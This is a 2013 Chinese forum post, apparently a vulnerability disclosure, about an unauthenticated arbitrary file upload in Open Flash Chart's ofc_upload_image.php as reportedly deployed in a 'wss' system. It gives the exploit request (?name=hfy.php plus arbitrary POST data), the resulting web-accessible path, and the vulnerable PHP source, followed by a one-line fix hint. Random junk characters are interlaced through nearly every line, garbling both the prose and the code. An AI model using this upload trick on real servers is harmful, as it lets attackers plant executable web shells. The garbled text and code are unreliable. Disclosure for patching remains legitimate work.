POST 数据漏洞文件执行任意后缀文件保存" c: Q- ^7 |) H: P, A
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
M/ e" ^" `0 [! x4 e: }0 J7 w0 X$ u' [4 @: k
利用: V0 T5 M2 S5 \& `, G1 z% E
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
: ]0 |1 D) {8 W$ V1 J3 z/ o( y, f& p4 @/ i1 A! t! N
Post任意数据9 W" X: @ K" l2 K$ n" l$ c
保存位置http://localhost/chart/tmp-upload-images/hfy.php. V0 D( f1 A* r
3 G; S5 I' A" s1 B
4 u& m% ?* |: x& z/ y最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~7 W) Z. q- v( x
" a* k% d. A7 u6 P& J
<?php# h) e2 q: Z6 O6 f$ Q/ ]( s( j, P, H
3 Y |# g/ A9 k# Z//% _1 p5 ^7 z" K; [+ w; a
// In Open Flash Chart -> save_image debug mode, you
/ B9 ^1 V$ p( s( q// will see the 'echo' text in a new window.
7 O- n. p( f% n; }5 \# y6 d% P& T//
, X! v9 R7 {$ b, A6 Q( |- `' x
4 u& K" s5 g Q( t' Y/*6 ~, { Y- B" x! ]/ x
) x9 i7 g' \8 l# k
print_r( $_GET );! ~) ?& Q6 u) c, ^' k' n) Q
print_r( $_POST );' b4 z. }/ A- F" L
print_r( $_FILES );) }* g$ V# A7 Z; T C, R" [' V
* z( B2 r8 M5 x: ^# F1 z
print_r( $GLOBALS );
+ e# q4 p9 r i4 j2 L9 v8 Sprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
" C5 {& T5 X: p) b2 P y/ k" q$ N; i, V4 Z7 {/ ~4 K7 P
*/
9 W6 w3 s5 U+ C" a6 Y/ f// default path for the image to be stored //& d; O" @5 Z: r8 p( D% T/ I3 b# P; z
$default_path = '../tmp-upload-images/';
! s1 K( g( w) z8 {( p$ s' }' W5 e m9 r, I+ m2 x7 L$ Y, u( h1 w
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
2 T, ~1 n0 j; r8 P# h( Q+ A. Y8 \ U8 M7 R
// full path to the saved image including filename //" n( g t# F+ m g2 }" n
$destination = $default_path . basename( $_GET[ 'name' ] ); 0 T+ b/ w- o* S1 D
8 f& A' p/ b, h. o: l
echo 'Saving your image to: '. $destination;
& ]7 P. Z( f# v3 J' _1 e, V// print_r( $_POST );9 W. f r" G; O* }! Z( c2 l
// print_r( $_SERVER ); @! i1 G" n, S' a% _
// echo $HTTP_RAW_POST_DATA;4 x) B, y, t0 i3 V! T/ O- {) @
/ o* \! z5 Q2 g5 D( w* J
//
. |$ z2 Q6 |% o/ X// POST data is usually string data, but we are passing a RAW .png6 u4 P+ O# I/ A* s0 L+ x
// so PHP is a bit confused and $_POST is empty. But it has saved
5 B2 |, ~, U: f( ?// the raw bits into $HTTP_RAW_POST_DATA7 S2 p" B# G* ^& D0 Q/ Y
//
" Z; H/ V) E/ _4 a+ [2 _# ?7 G, } X9 ]8 _3 s; k- H" X' S
$jfh = fopen($destination, 'w') or die("can't open file");, A9 W( T' |1 w' q% Y
fwrite($jfh, $HTTP_RAW_POST_DATA);
0 v& ^2 L% q. S% n Rfclose($jfh);
2 R" [5 R, ~, v# C3 w$ x7 p) e2 O# Y. N$ j$ k) {
//
7 o5 }+ N( s) j2 d// LOOK:
1 i6 k: n, i& A/ q, L; M//
! E0 ?0 } M4 P' nexit();8 x: n9 B7 d: ~9 r
//
1 @4 a) V' t: Q& X// PHP5:/ x+ w- z4 W) p5 V) s. v
//; |6 g% x" _: ?6 w/ y6 x, Z
" T# |' B2 B+ n# o$ T6 c4 C: H5 X2 M, N4 L2 v( P5 l# R6 M3 O
// default path for the image to be stored //
9 V8 Y. H7 i. V( C3 \, c ?& I$default_path = 'tmp-upload-images/';+ \5 u! B( c1 ~2 n( @ n8 q+ R& G
h: ]+ z$ B6 M' y) d
if (!file_exists($default_path)) mkdir($default_path, 0777, true);: i- a4 I' s1 v6 |0 }" h8 \! ^5 x
. F" Y$ q- V8 X
// full path to the saved image including filename //
; L9 p6 m4 m: J l/ d! t# }* S6 q1 l$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
1 y; W5 a% D' X0 I
, H! S: L7 Y9 |# M; O+ r. I3 K6 [// move the image into the specified directory //
% r' x( |- ~4 V% H) }! r" ^if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {- |0 T7 g) I/ L5 _- Y4 S
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
6 f4 K8 w q" W; e( |} else {
. k7 k! t. B# |4 \ m0 b, \; c$ _ echo "FILE UPLOAD FAILED";3 m& Z. }3 n6 ]: k2 N$ w
}& q' K9 Y& @1 S8 Z" r) S2 ^
5 Y+ M: L: F& j s# c: H/ N, a; l4 G1 t7 G, L
& x! c9 Y% \1 B/ f& K& I?>
" v3 |& l: ^/ ]- J, t7 ]% c' Z0 a* H' Y
- n: E* n) I; n+ p
* |5 O% x6 P) `) k
) q0 b/ y& T N# u/ L2 M2 B! T+ o
0 s; M: S9 c; D, b, C6 ^
( W8 W( G* H7 J, v/ [$ O修复方案: " ]" j$ w3 r/ L# w; z1 x& p3 j
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
/ K% M: P, U" h; K" n! }; k4 `- w8 P" ]4 d
' Q) y* S( e7 s1 n. g- [' l* }2 {0 A
+ p1 l2 y) U2 l, c
|
发表于 2013-2-23 12:38:58
收藏
支持
反对